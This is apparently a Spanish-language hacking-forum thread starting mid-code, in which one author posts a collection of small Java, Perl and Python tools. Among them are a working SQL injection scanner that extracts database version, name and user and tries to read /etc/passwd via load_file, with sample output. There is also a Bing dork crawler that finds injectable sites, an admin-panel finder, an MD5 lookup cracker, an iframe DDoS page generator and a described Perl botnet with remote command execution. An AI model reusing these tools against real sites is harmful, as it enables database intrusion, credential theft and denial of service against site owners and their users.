        StringBuffer conte = new StringBuffer(40);

        URL url = new URL(urla);
        URLConnection hc = url.openConnection();
        hc.setRequestProperty("User-Agent", "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");

        BufferedReader nave = new BufferedReader(
                new InputStreamReader(hc.getInputStream()));

        while ((re = nave.readLine()) != null) {
            conte.append(re);
        }

        nave.close();

        return conte.toString();

    }

    public static String encodehex(String text) {

//Thanks to Katarina Majetic
//Based on http://www.dzone.com/snippets/encode-string-hex

        byte[] z = text.getBytes();
        StringBuffer h = new StringBuffer();
        String l;
        int n;
        int a = z.length;
        int u;

        for (n = 0; n < a; n++) {
            u = z[n] & 0x000000FF;
            l = Integer.toHexString(u);
            h.append(l);
        }
        return "0x" + h.toString();
    }
}

//The End ?

  

Un simple Scanner SQLI hecho en Java.

Código (java) [Seleccionar] Expandir


//SQL Scanner 0.1
//Coded By Doddy H

import java.util.Scanner;
import java.io.*;
import java.net.*;

import java.util.regex.Matcher;
import java.util.regex.Pattern;

public class Main {

   public static void main(String[] args) throws Exception {


       String codex;
       String target;

       Pattern uno = null;
       Matcher dos = null;

       Scanner host = new Scanner(System.in);
       System.out.println("\n\n-- == SQL Scanner 0.1 == --\n\n");
       System.out.println("[+] Page : ");
       target = host.nextLine();

       System.out.println("\n[+] Checking ...\n");

       codex = toma(target + "-1+union+select+666--");

       uno = Pattern.compile("The used SELECT statements have a different number of columns");
       dos = uno.matcher(codex);

       if (dos.find()) {
           System.out.println("[+] Scanning ...\n");

           int x;
           String urlfinal;
           String otrofinal;
           String code;
           String formariny;
           String otroformar;
           String link;

           urlfinal = "";
           formariny = "";

           for (x = 1; x <= 5; x = x + 1) {

//urlfinal = urlfinal+x+",";
               urlfinal = urlfinal + encodehex("RATSXPDOWN" + x) + ",";
               formariny = formariny + x + ",";

               otrofinal = urlfinal;
               otroformar = formariny;

               otrofinal = otrofinal.substring(0, otrofinal.length() - 1);
               otroformar = otroformar.substring(0, otroformar.length() - 1);

               code = toma(target + "-1+union+select+" + otrofinal);

               uno = Pattern.compile("RATSXPDOWN(\\d+)");
               dos = uno.matcher(code);

               if (dos.find()) {

                   otroformar = otroformar.replace(dos.group(1), "hackman");

                   link = target + "-1+union+select+" + otroformar;

                   System.out.println("[Target] : " + link);
                   System.out.println("[Limit] : The site has " + x + " columns");
                   System.out.println("[Data] : The number " + dos.group(1) + " print data");

                   savefile("logs-scansql.txt", "[Target] : " + link);
                   savefile("logs-scansql.txt", "[Limit] : The site has " + x + " columns");
                   savefile("logs-scansql.txt", "[Data] : The number " + dos.group(1) + " print data");

                   System.out.println("\n[+] Searching informaion ...\n");

                   details(link);

                   System.out.println("\n[+] Finished");

                   System.out.println("\n-- == Coded By Doddy H == --");

                   savefile("logs-scansql.txt", "\n-----------------\n");

                   System.exit(1);

               }

           }
           System.out.println("[-] Error");
       } else {
           System.out.println("[-] Not vulnerable");
       }

   }

   private static void details(String urla) throws Exception {

       String concat;
       String code;

       Pattern uno = null;
       Matcher dos = null;

       concat = "concat(char(69,82,84,79,82,56,53,52),version(),char(69,82,84,79,82,56,53,52),database(),char(69,82,84,79,82,56,53,52),user(),char(69,82,84,79,82,56,53,52))";

       urla = urla.replace("hackman", concat);

       code = toma(urla);

       uno = Pattern.compile("ERTOR854(.*)ERTOR854(.*)ERTOR854(.*)ERTOR854");
       dos = uno.matcher(code);

       if (dos.find()) {
           System.out.println("[+] DB Version : " + dos.group(1));
           System.out.println("[+] DB Name : " + dos.group(2));
           System.out.println("[+] Username : " + dos.group(3));

           savefile("logs-scansql.txt", "[+] DB Version : " + dos.group(1));
           savefile("logs-scansql.txt", "[+] DB Name : " + dos.group(2));
           savefile("logs-scansql.txt", "[+] Username : " + dos.group(3));

       } else {
           System.out.println("[-] Not found any data");
       }

       urla = urla.replace(concat, "char(69,82,84,79,82,56,53,52)");

       code = toma(urla + "+from+information_schema.tables--");
       uno = Pattern.compile("ERTOR854");
       dos = uno.matcher(code);

       if (dos.find()) {
           System.out.println("[+] information_schema : on");
           savefile("logs-scansql.txt", "[+] information_schema : on");
       } else {
           System.out.println("[-] information_schema : off");
       }

       code = toma(urla + "+from+mysql.user--");
       uno = Pattern.compile("ERTOR854");
       dos = uno.matcher(code);

       if (dos.find()) {
           System.out.println("[+] mysqluser : on");
           savefile("logs-scansql.txt", "[+] mysqluser : on");
       } else {
           System.out.println("[-] mysquser : off");
       }

       urla = urla.replace("char(69,82,84,79,82,56,53,52)", "concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))");

//ystem.out.print(urla);

       code = toma(urla);
       uno = Pattern.compile("ERTOR854");
       dos = uno.matcher(code);

       if (dos.find()) {
           System.out.println("[-] load_file : on");
           savefile("logs-scansql.txt", "[-] load_file : on");
       } else {
           System.out.println("[-] load_file : off");
       }

   }

   private static void savefile(String nombre, String texto) throws Exception {

       FileWriter writer = new FileWriter(nombre, true);
       writer.write(texto + "\r\n");
       writer.close();

   }

   private static String toma(String urla) throws Exception {

       String re;

       StringBuffer conte = new StringBuffer(40);

       URL url = new URL(urla);
       URLConnection hc = url.openConnection();
       hc.setRequestProperty("User-Agent", "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");

       BufferedReader nave = new BufferedReader(
               new InputStreamReader(hc.getInputStream()));

       while ((re = nave.readLine()) != null) {
           conte.append(re);
       }

       nave.close();

       return conte.toString();

   }

   public static String encodehex(String text) {

//Thanks to Katarina Majetic
//Based on http://www.dzone.com/snippets/encode-string-hex

       byte[] z = text.getBytes();
       StringBuffer h = new StringBuffer();
       String l;
       int n;
       int a = z.length;
       int u;

       for (n = 0; n < a; n++) {
           u = z[n] & 0x000000FF;
           l = Integer.toHexString(u);
           h.append(l);
       }
       return "0x" + h.toString();
   }
}

//The End ?


Ejemplo de uso

Código [Seleccionar] Expandir



-- == SQL Scanner 0.1 == --


[+] Page :
http://localhost/sql.php?id=

[+] Checking ...

[+] Scanning ...

[Target] : http://localhost/sql.php?id=-1+union+select+hackman,2,3
[Limit] : The site has 3 columns
[Data] : The number 1 print data

[+] Searching informaion ...

[+] DB Version : 5.5.20-log
[+] DB Name : hackman
[+] Username : root@localhost
[+] information_schema : on
[+] mysqluser : on
[-] load_file : off

[+] Finished

-- == Coded By Doddy H == --



Un simple programa para buscar en Bing paginas vulnerables a SQLI.

Código (java) [Seleccionar] Expandir


//
//BingHack Tool 0.1
//Coded By Doddy H
//

import java.util.Scanner;
import java.io.*;
import java.net.*;

import java.util.regex.Matcher;
import java.util.regex.Pattern;

public class Main {

    public static void main(String[] args) throws Exception {

        String code;
        String tar;
        int x;
        String dork;
        int counte;
        String urlfinal;

        Pattern uno = null;
        Matcher dos = null;

        Scanner host = new Scanner(System.in);
        System.out.println("\n\n-- == BingHack Tool 0.1 == --\n\n");
        System.out.println("[+] Dork : ");
        dork = host.nextLine();

        System.out.println("[+] Count : ");
        counte = host.nextInt();

        System.out.println("\n[+] Searching ...\n");

        for (x = 10; x <= counte; x = x + 10) {

            code = toma("http://www.bing.com/search?q=" + dork + "&first=" + x);

            uno = Pattern.compile("<h3><a href=\"(.*?)\"");
            dos = uno.matcher(code);

            while (dos.find()) {

                urlfinal = cortar(dos.group(1));

                sql(urlfinal);

            }

        }

        System.out.println("\n[+] Finished");
        System.out.println("\n-- == Coded By Doddy H == --");

    }

    private static void savefile(String nombre, String texto) throws Exception {

        FileWriter writer = new FileWriter(nombre, true);
        writer.write(texto + "\r\n");
        writer.close();

    }

    private static void sql(String urla) throws Exception {

        String code;
        String mostrar;

        Pattern uno = null;
        Matcher dos = null;

        mostrar = urla + "-1+union+select+666--";

        try {
            code = toma(mostrar);

            uno = Pattern.compile("The used SELECT statements have a different number of columns");
            dos = uno.matcher(code);

            if (dos.find()) {
                System.out.println("[+] SQLI : " + urla);
                savefile("sql-logs.txt", urla);
            }

        } catch (Exception ex) {
        }

    }

    private static String cortar(String urla) throws Exception {

        Pattern uno = null;
        Matcher dos = null;

        uno = Pattern.compile("(.*)=(.*)");
        dos = uno.matcher(urla);

        if (dos.find()) {

            return (dos.group(1) + "=");
        } else {
            return "no tengo idea xDD";
        }

    }

    private static String toma(String urla) throws Exception {

        String re;

        StringBuffer conte = new StringBuffer(40);

        URL url = new URL(urla);
        URLConnection hc = url.openConnection();
        hc.setRequestProperty("User-Agent", "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");

        BufferedReader nave = new BufferedReader(
                new InputStreamReader(hc.getInputStream()));

        while ((re = nave.readLine()) != null) {
            conte.append(re);
        }

        nave.close();

        return conte.toString();

    }
}

//The End ?


Un simple programa para buscar la localizacion de una IP.

Código (java) [Seleccionar] Expandir


//LocateIP 0.1
//Coded By Doddy H

import java.util.Scanner;
import java.io.*;
import java.net.*;

import java.util.regex.Matcher;
import java.util.regex.Pattern;

public class Main {

    public static void main(String[] args) throws Exception {

        String ip;
        Scanner host = new Scanner(System.in);
        System.out.println("\n\n-- == LocateIP 0.1 == --\n\n");
        System.out.println("[+] IP : ");
        ip = host.nextLine();

        String code;

        code = toma("http://www.melissadata.com/lookups/iplocation.asp?ipaddress=" + ip);

        Pattern uno = null;
        Matcher dos = null;

        uno = Pattern.compile("City</td><td align=(.*?)><b>(.*?)</b></td>");
        dos = uno.matcher(code);

        if (!dos.find()) {
            System.out.println("[+] City : Not Found");
        } else {
            System.out.println("[+] City : " + dos.group(2));
        }

        uno = Pattern.compile("Country</td><td align=(.*?)><b>(.*?)</b></td>");
        dos = uno.matcher(code);

        if (!dos.find()) {
            System.out.println("[+] Country : Not Found");
        } else {
            System.out.println("[+] Country : " + dos.group(2));
        }

        uno = Pattern.compile("State or Region</td><td align=(.*?)><b>(.*?)</b></td>");
        dos = uno.matcher(code);

        if (!dos.find()) {
            System.out.println("[+] State or Region : Not Found");
        } else {
            System.out.println("[+] State or Region : " + dos.group(2));
        }

//code = toma("http://www.ip-adress.com/reverse_ip/178.33.230.100");

//uno = Pattern.compile("/whois/(.*?)\">Whois");
//dos = uno.matcher(code);

//while(dos.find()) {
//System.out.println("[+] DNS : "+dos.group(1));
//}

        System.out.println("\n\n-- == Coded By Doddy H == --");

    }

    private static String toma(String urla) throws Exception {

        String re;

        StringBuffer conte = new StringBuffer(40);

        URL url = new URL(urla);
        URLConnection hc = url.openConnection();
        hc.setRequestProperty("User-Agent", "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");

        BufferedReader nave = new BufferedReader(
                new InputStreamReader(hc.getInputStream()));

        while ((re = nave.readLine()) != null) {
            conte.append(re);
        }

        nave.close();

        return conte.toString();

    }
}

// The End ?


Un simple programa para buscar el famoso panel de administracion en una pagina.

Código (java) [Seleccionar] Expandir


//PanelFinder 0.1
//Coded By Doddy H

import java.util.Scanner;
import java.net.URL;

public class Main {

    public static void main(String[] args) {

        String[] paneles = {
            "admin/admin.asp", "admin/login.asp", "admin/index.asp", "admin/admin.aspx", "admin/login.aspx", "admin/index.aspx", "admin/webmaster.asp", "admin/webmaster.aspx", "asp/admin/index.asp", "asp/admin/index.aspx", "asp/admin/admin.asp", "asp/admin/admin.aspx", "asp/admin/webmaster.asp", "asp/admin/webmaster.aspx", "admin/", "login.asp", "login.aspx", "admin.asp", "admin.aspx", "webmaster.aspx", "webmaster.asp", "login/index.asp", "login/index.aspx", "login/login.asp", "login/login.aspx", "login/admin.asp", "login/admin.aspx", "administracion/index.asp", "administracion/index.aspx", "administracion/login.asp", "administracion/login.aspx", "administracion/webmaster.asp", "administracion/webmaster.aspx", "administracion/admin.asp", "administracion/admin.aspx", "php/admin/", "admin/admin.php", "admin/index.php", "admin/login.php", "admin/system.php", "admin/ingresar.php", "admin/administrador.php", "admin/default.php", "administracion/", "administracion/index.php", "administracion/login.php", "administracion/ingresar.php", "administracion/admin.php", "administration/", "administration/index.php", "administration/login.php", "administrator/index.php", "administrator/login.php", "administrator/system.php", "system/", "system/login.php", "admin.php", "login.php", "administrador.php", "administration.php", "administrator.php", "admin1.html", "admin1.php", "admin2.php", "admin2.html", "yonetim.php", "yonetim.html", "yonetici.php", "yonetici.html", "adm/", "admin/account.php", "admin/account.html", "admin/index.html", "admin/login.html", "admin/home.php", "admin/controlpanel.html", "admin/controlpanel.php", "admin.html", "admin/cp.php", "admin/cp.html", "cp.php", "cp.html", "administrator/", "administrator/index.html", "administrator/login.html", "administrator/account.html", "administrator/account.php", "administrator.html", "login.html", "modelsearch/login.php", "moderator.php", "moderator.html", "moderator/login.php", "moderator/login.html", "moderator/admin.php", "moderator/admin.html", "moderator/", "account.php", "account.html", "controlpanel/", "controlpanel.php", "controlpanel.html", "admincontrol.php", "admincontrol.html", "adminpanel.php", "adminpanel.html", "admin1.asp", "admin2.asp", "yonetim.asp", "yonetici.asp", "admin/account.asp", "admin/home.asp", "admin/controlpanel.asp", "admin/cp.asp", "cp.asp", "administrator/index.asp", "administrator/login.asp", "administrator/account.asp", "administrator.asp", "modelsearch/login.asp", "moderator.asp", "moderator/login.asp", "moderator/admin.asp", "account.asp", "controlpanel.asp", "admincontrol.asp", "adminpanel.asp", "fileadmin/", "fileadmin.php", "fileadmin.asp", "fileadmin.html", "administration.html", "sysadmin.php", "sysadmin.html", "phpmyadmin/", "myadmin/", "sysadmin.asp", "sysadmin/", "ur-admin.asp", "ur-admin.php", "ur-admin.html", "ur-admin/", "Server.php", "Server.html", "Server.asp", "Server/", "wp-admin/", "administr8.php", "administr8.html", "administr8/", "administr8.asp", "webadmin/", "webadmin.php", "webadmin.asp", "webadmin.html", "administratie/", "admins/", "admins.php", "admins.asp", "admins.html", "administrivia/", "Database_Administration/", "WebAdmin/", "useradmin/", "sysadmins/", "admin1/", "system-administration/", "administrators/", "pgadmin/", "directadmin/", "staradmin/", "ServerAdministrator/", "SysAdmin/", "administer/", "LiveUser_Admin/", "sys-admin/", "typo3/", "panel/", "cpanel/", "cPanel/", "cpanel_file/", "platz_login/", "rcLogin/", "blogindex/", "formslogin/", "project-admins/", "phppgadmin/", "pureadmin/", "sql-admin/", "radmind/", "openvpnadmin/", "wizmysqladmin/", "vadmind/", "ezsqliteadmin/", "hpwebjetadmin/", "newsadmin/", "adminpro/", "Lotus_Domino_Admin/", "bbadmin/", "vmailadmin/", "Indy_admin/", "ccp14admin/", "irc-macadmin/", "banneradmin/", "sshadmin/", "phpldapadmin/", "macadmin/", "administratoraccounts/", "admin4_account/", "admin4_colon/", "radmind-1/", "Super-Admin/", "AdminTools/", "cmsadmin/", "SysAdmin2/", "globes_admin/", "cadmins/", "phpSQLiteAdmin/", "navSiteAdmin/", "server_admin_small/", "logo_sysadmin/", "server/", "database_administration/", "power_user/", "system_administration/", "ss_vms_admin_sm/"};

        String target;
        String ur;

        Scanner host = new Scanner(System.in);
        System.out.println("\n\n-- == PanelFinder 0.1 == --\n\n");
        System.out.println("[+] URL : ");
        target = host.nextLine();

        System.out.println("\n[+] Scanning ...\n");

        for (int count = 0; count < paneles.length; count++) {

            ur = target + "/" + paneles[count];

            try {

                URL u = new URL(ur);

                Object o = u.getContent();
                System.out.println("[+] Link : " + ur);
            } catch (Exception ex) {
            }

        }

        System.out.println("\n[+] Finished\n");
        System.out.println("-- == Coded By Doddy H == --");

    }
}

//The End ?


Un simple programa para crackear un hash md5 mediante una pagina online.

Código (java) [Seleccionar] Expandir


//
//CrackHash 0.1
//Coded By Doddy H
//
//Test with 098f6bcd4621d373cade4e832627b4f6
//
//

import java.util.Scanner;
import java.io.*;
import java.net.*;

import java.util.regex.Matcher;
import java.util.regex.Pattern;

public class Main {

    public static void main(String[] args) throws Exception {

        String hash;
        Scanner host = new Scanner(System.in);
        System.out.println("\n\n-- == CrackHash 0.1 == --\n\n");
        System.out.println("[+] Hash : ");
        hash = host.nextLine();

        String code;

        code = toma("http://md5.hashcracking.com/search.php?md5=" + hash);

        Pattern uno = null;
        Matcher dos = null;

        uno = Pattern.compile("Cleartext of (.*) is (.*)");
        dos = uno.matcher(code);

        if (!dos.find()) {
            System.out.println("\n[-] Not Found");
        } else {
            System.out.println("\n[+] Hash Cracked : " + dos.group(2));
        }

        System.out.println("\n\n-- == Coded By Doddy H == --");

    }

    private static String toma(String urla) throws Exception {

        String re;

        StringBuffer conte = new StringBuffer(40);

        URL url = new URL(urla);
        URLConnection hc = url.openConnection();
        hc.setRequestProperty("User-Agent", "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");

        BufferedReader nave = new BufferedReader(
                new InputStreamReader(hc.getInputStream()));

        while ((re = nave.readLine()) != null) {
            conte.append(re);
        }

        nave.close();

        return conte.toString();

    }
}

//The End ?


Un simple programa para cortar urls.

Código (java) [Seleccionar] Expandir


/**
* URL Shorter 0.1
* Coded By Doddy H
*/

import java.util.Scanner;
import java.net.*;
import java.io.*;

public class Main {
    public static void main(String[] args) throws Exception {
       
      String pagina;
      String re;
     
      Scanner host = new Scanner(System.in);
      System.out.println("\n\n-- == URL Shorter 0.1 == --\n\n");
      System.out.println("[+] Page : ");
      pagina = host.nextLine();

      URL cargar = new URL("http://tinyurl.com/api-create.php?url="+pagina);
      BufferedReader nave = new BufferedReader(
      new InputStreamReader(cargar.openStream()));

      while ((re = nave.readLine()) != null)
        System.out.println("\n[+] Link : "+re);
      nave.close();
   
      System.out.println("\n\n-- == Coded By Doddy H == --");
    }
}

/**
* The End ?
*/


Un simple poc para iframe ddos.

Código (java) [Seleccionar] Expandir


/**
* Iframe DDOS 0.1
* Coded By Doddy H
*/

import java.util.Scanner;
import java.net.*;
import java.io.*;

public class Main {
    public static void main(String[] args) throws IOException{

      String pagina;
      int cantidad;
      int y;

      FileOutputStream fos;
      DataOutputStream dos;

      Scanner host = new Scanner(System.in);
      System.out.println("\n\n-- == Iframe DDOS 0.1 == --\n\n");
      System.out.println("[+] Page : ");
      pagina = host.nextLine();
      System.out.println("[+] Count : ");
      cantidad = host.nextInt();

      FileWriter ar=new FileWriter("poc.html");
      BufferedWriter go=new BufferedWriter(ar);
      PrintWriter archivo=new PrintWriter(go);

      for (y=1;y<=cantidad;y++){
        archivo.println("<iframe src='"+pagina+"' width='3' height='3'></iframe><br>");
      }
      archivo.close();
      System.out.println("\n[+] All done ...");
      System.out.println("\n\n-- == Coded By Doddy H == --");
    }
}

/**
* The End ?
*/


Ja , como regalo de navidad les dejo el script navideño xDDD.

El codigo

Código (perl) [Seleccionar] Expandir


#!usr/bin/perl
#El script navideño
#Coded By Doddy H

while(true) {

my($dia,$mes,$año,$hora,$minutos,$segundos) = agarrate_la_hora();

unless($dia eq "25" and $mes eq "12") {
syswrite STDOUT,"[+] Fecha y hora : $dia/$mes/$año $hora:$minutos:$segundos \r";
} else {
syswrite STDOUT,"\n\n[+] Feliz navidad !";
<stdin>;
exit(1);
}

}

sub agarrate_la_hora {

my ($a,$b,$c,$d,$e,$f,$g,$h,$i) = localtime(time);

$f+= 1900;
$e++;

return($d,$e,$f,$c,$b,$a);

}

#The End ?


Bueno , siempre quize hacer una botnet en Perl , logre programar una bien basica que tiene las siguientes opciones :

• Ejecucion de comandos
  
• Simple GetIP
  
• Listar procesos activos
  
• Matar procesos
  
• Listar archivos de un directorio
  
• Borrar un archivo o directorio cualquiera
  
• Leer archivos
  
• Abrir y cerrar lectora
  
• Ocultar y mostrar programas del escritorio
  
• Ocultar y mostrar Taskbar
  
• Mandar mensajitos molestos
  
• Abrir Word y hacer que escriba solo (una idea muy grosa xDD)
  
• Hacer que el teclado escriba solo
  
• Volver loco al mouse haciendo que se mueva por la pantalla
  
  Para usar esta botnet necesitan un hosting que permita PHP y Mysql.
  
  Una imagen del generador :
  
  
  
  Otra imagen de la botnet en accion :
  
  
  
  El codigo lo pueden encontrar aca.

[AVISO : Solo esta probado en el foro spam portalhacker spam .]

Traduccion a Perl (mega buggeada) del script que hizo Javier de PortalHacker para poder leer los mensajes privados y listar las categorias de un foro SMF.

El codigo

Código (perl) [Seleccionar] Expandir


#!usr/bin/perl
#SMF Manager 0.00001
#Coded By Doddy H

#ppm install http://www.bribes.org/perl/ppm/HTML-Strip.ppd

use LWP::UserAgent;
use HTTP::Cookies;

use HTML::Strip;

my $nave = LWP::UserAgent->new(
   cookie_jar            => HTTP::Cookies->new(),
   requests_redirectable => [],
   timeout               => 5,
   agent =>
"Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12"
);

print qq(
 @@@   @     @  @@@@@    @     @                                  
@   @  @     @  @        @     @                                  
@      @@   @@  @        @@   @@                                  
@      @@   @@  @        @@   @@   @@@  @ @@   @@@   @@@@  @@@  @@
 @@@   @ @ @ @  @@@@     @ @ @ @      @ @@  @     @ @   @ @   @ @
    @  @ @ @ @  @        @ @ @ @   @@@@ @   @  @@@@ @   @ @@@@@ @
    @  @  @  @  @        @  @  @  @   @ @   @ @   @ @   @ @     @
@   @  @  @  @  @        @  @  @  @   @ @   @ @   @ @   @ @   @ @
 @@@   @     @  @        @     @   @@@@ @   @  @@@@  @@@@  @@@  @
                                                        @        
                                                    @@@@          

);

print "\n\n[+] Page : ";
chomp( my $url = <stdin> );

print "\n[+] Username : ";
chomp( my $usera = <stdin> );

print "\n[+] Password : ";
chomp( my $passa = <stdin> );

## Login

print "\n[+] Connecting ....\n\n";

my $code = $nave->post(
   $url . "/index.php?action=login2",
   {
       "user"         => $usera,
       "passwrd"      => $passa,
       "cookielength" => "9000",
       "hash_passwrd" => "",
       "submit"       => "submit"
   }
);

if ( $code->is_redirect ) {

   #print $code->header('location'),"\n";
}
elsif ( $code->is_success ) {
   print $code->as_string, "\n";
}
else {
   print STDERR $code->status_line, "\n";
}

my $code = toma( $url . "/SSI.php?ssi_function=welcome" );

if ( $code =~ /Hola, <strong>(.*)<\/strong>/ ) {
   my $name = $1;
   print "[+] Welcome $name\n";
}
else {
   print "[-] Error\n";
}

##

while (1) {

   print "\n[+] Options\n\n";

   print "1 - See MP\n";
   print "2 - Navegate\n";
   print "3 - Exit\n";

   print "\n[+] Option : ";
   chomp( my $op = <stdin> );

   if ( $op eq "3" ) {
       exit(1);
   }

   if ( $op eq "1" ) {

       print qq(
@     @  @@@@@
@     @  @    @
@@   @@  @    @
@@   @@  @    @
@ @ @ @  @@@@@
@ @ @ @  @    
@  @  @  @    
@  @  @  @    
@     @  @    

);

       mps($url);
   }

   if ( $op eq "2" ) {
       print qq(
@    @                                        
@@   @                                @      
@@   @                                @      
@ @  @   @@@  @   @  @@@   @@@@  @@@  @@  @@@
@ @  @      @ @   @ @   @ @   @     @ @  @   @
@  @ @   @@@@  @ @  @@@@@ @   @  @@@@ @  @@@@@
@   @@  @   @  @ @  @     @   @ @   @ @  @    
@   @@  @   @   @   @   @ @   @ @   @ @  @   @
@    @   @@@@   @    @@@   @@@@  @@@@  @  @@@
                              @              
                          @@@@                


);

       my $chau2 = 0;

       while ( $chau2 eq 0 ) {

           print "\n[+] 1 - List Categories\n";
           print "[+] 2 - Exit\n";

           print "\n[+] Option : ";
           chomp( my $op = <stdin> );

           if ( $op eq "1" ) {

               print "\n[+] Searching ...\n\n";

               my $code = toma($url);

               while ( $code =~
/<a class=\"subject\" href=\"(.*?)\" name=(.*?)>(.*?)<\/a>/migs
                 )
               {
                   print "[+] ID : $2 [+] Name : $3\n";
               }

           }
           else {
               $chau2 = 1;
           }

       }

   }

}

#gets_list_mp();
#gets_msg_mp();
#gets_msg_now();

sub mps {

   my $url = shift;

   my $chau = "0";

   print "\n[+] Searching pages ..\n";

   my @founds = gets_list_mp($url);

   my $count = int(@founds);

   print "\n[+] Pages Found : $count\n";

   while ( $chau eq 0 ) {

       print "\n[+] 1 - Get List Messages\n";
       print "[+] 2 - Read Message\n";
       print "[+] 3 - Exit\n";

       print "\n[+] Option : ";
       chomp( my $op = <stdin> );

       if ( $op eq "1" ) {

           print "\n[+] Number Page : ";
           chomp( my $op = <stdin> );

           print "\n[+] Searching ..\n";

           gets_msg_mp( $founds[ $op - 1 ] );

       }
       elsif ( $op eq "2" ) {

           print "\n[+] Number Page : ";
           chomp( my $n = <stdin> );

           print "\n[+] ID : ";
           chomp( my $id = <stdin> );

           print "\n[+] Reading ...\n";

           gets_msg_now( $founds[ $n - 1 ], $id );

       }
       else {
           $chau = 1;
       }

   }
}

sub gets_msg_now {

   my $url = toma( $_[0] );

   my $id = "msg_" . $_[1];

   if ( $url =~ /<div class=\"inner\" id=\"$id\">(.*?)<\/div>/mig ) {

       my $uno = HTML::Strip->new( emit_spaces => 1 );
       my $final = $uno->parse($1);
       $final =~ s/^[\t\f ]+|[\t\f ]+$//mg;

       print "\n[START]\n\n";
       print $final;
       print "\n\n[END]\n\n";

   }

}

sub gets_msg_mp {

   my $url = toma( $_[0] );

   my @ids;
   my @asunto;
   my @nombre;

   while ( $url =~ /<td><a href=\"#msg(.*?)\">(.*?)<\/a><\/td>/migs ) {

       #print "$1 $2\n";
       push( @ids,    $1 );
       push( @asunto, $2 );
   }

   while ( $url =~ /Ver perfil de (.*?)">/migs ) {

       #print "$1\n\n";
       push( @nombre, $1 );
   }

   my $total = int(@ids) - 1;

   for my $num ( 0 .. $total ) {
       print "[+] ID : "
         . $ids[$num]
         . " [+] Asunto : "
         . $asunto[$num]
         . " [+] De : "
         . $nombre[$num] . "\n";
   }

}

sub gets_list_mp {

   my $url = shift;

   my @paginas;
   my $code = toma( $url . "/index.php?action=pm" );

   push( @paginas, $url . "/index.php?action=pm" );

   while ( $code =~ /<a class="navPages" href="(.*?)">(.*?)<\/a>/migs ) {
       push( @paginas, $1 );
   }

   my @paginas = repes(@paginas);

   return @paginas;

}

sub repes {
   my @limpio;
   foreach $test (@_) {
       push @limpio, $test unless $repe{$test}++;
   }
   return @limpio;
}

sub toma {
   return $nave->get( $_[0] )->content;
}

sub tomar {
   my ( $web, $var ) = @_;
   return $nave->post( $web, [ %{$var} ] )->content;
}

#The End ?


AVISO : Solo esta probado en el foro  spam portalhacker spam .  

Traduccion a Python de este simple script para buscar y bajar musica.

El codigo

Código (python) [Seleccionar] Expandir


#!usr/bin/python
#MP3 Downloader 0.1
#Coded By Doddy H

import sys,urllib,urllib2,re,os,urlparse

def toma(web) :
nave = urllib2.Request(web)
nave.add_header('User-Agent','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5');
op = urllib2.build_opener()
return op.open(nave).read()

def clean():
if sys.platform=="win32":
  os.system("cls")
else:
  os.system("clear")

def head():
print """

@     @  @@@@@   @@@     @@@@     @@@@  @         @ @    @
@     @  @    @ @   @    @   @   @    @ @         @ @@   @
@@   @@  @    @     @    @    @  @    @  @   @   @  @@   @
@@   @@  @    @     @    @    @  @    @  @   @   @  @ @  @
@ @ @ @  @@@@@    @@     @    @  @    @  @   @   @  @ @  @
@ @ @ @  @          @    @    @  @    @   @ @ @ @   @  @ @
@  @  @  @          @    @    @  @    @   @ @ @ @   @   @@
@  @  @  @      @   @    @   @   @    @    @   @    @   @@
@     @  @       @@@     @@@@     @@@@     @   @    @    @



                                         
                              Coded By Doddy H

                                       
"""

def copyright():
print "\n\n(C) Doddy Hackman 2012\n"
raw_input()
sys.exit(1)

def proxar(a,b,c):
sys.stdout.write("\r[+] Status : %s / %s" % (a * b,c))
 
def down(file,filesave):
print "\n[+] File to download : "+filesave+"\n"
try:
  urllib.urlretrieve(file,filesave,reporthook=proxar)
except:
  print "\n[-] Error\n"
  copyright()
print "\n\n[+] File Download in "+os.curdir+"/"+filesave

def buscar(titulo) :

songs = []
datas =[]
links = []
datas_back = []
links_back = []

titulo = re.sub(" ","_",titulo)

print "\n\n[+] Searching ...\n"

code = toma("http://mp3skull.com/mp3/"+titulo+".html")

if not (re.findall("Sorry, no results found for",code)):

  songs = re.findall("<div style=\"font-size:15px;\"><b>(.*)<\/b><\/div>",code)
  datas_back = re.findall("<!-- info mp3 here -->\s+(.*?)<\/div>",code)
  links_back = re.findall("<a href=\"(.*)\.mp3\"",code)

  for datac in datas_back :
   datac = re.sub("<br />"," ",datac)
   datas.append(datac)

  for li in links_back :
   lic = li+".mp3"
   links.append(lic)

  try:
   for counter in range(0,len(songs)):
    print "\n[Song "+str(counter)+"] : "+songs[counter]
    print "[Data] : "+datas[counter]
    print "[Link] : "+links[counter]

  except:
   pass

  while 1:

   print "\n[+] Options\n"
   print "[+] 1 - Download"
   print "[+] 2 - Search"
   print "[+] 3 - Exit\n"

   op = raw_input("[+] Option : ")

   if op  == "3":
    print "\n\n[+] Finished\n"
    copyright() 

   if op == "2":
    party()

   if op == "1":
    num = input("\n[?] Number :")
    down(links[num],os.path.basename(links[num]))

else:
  print "\n[-] Not Found\n";
  raw_input()
  party()

def party():

clean()
head()

bs = raw_input("\n\n[?] Song : ")

buscar(bs)

##

if not os.path.isdir("mp3_downloads"):
os.makedirs("mp3_downloads")

os.chdir("mp3_downloads")

party()

##

#The End ?


Hice este simple script para buscar y bajar musica.

El codigo

Código (perl) [Seleccionar] Expandir


#!usr/bin/perl
#MP3 Downloader 0.1
#Coded By Doddy H

use LWP::UserAgent;
use URI::Split qw(uri_split);
use Time::HiRes "usleep";

my $nave = LWP::UserAgent->new;
$nave->agent(
"Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12"
);
$nave->timeout(5);

my $se = "downloads_mp3";

unless ( -d $se ) {
    mkdir( $se, "777" );
}

chdir $se;

head();

print "[?] Song : ";
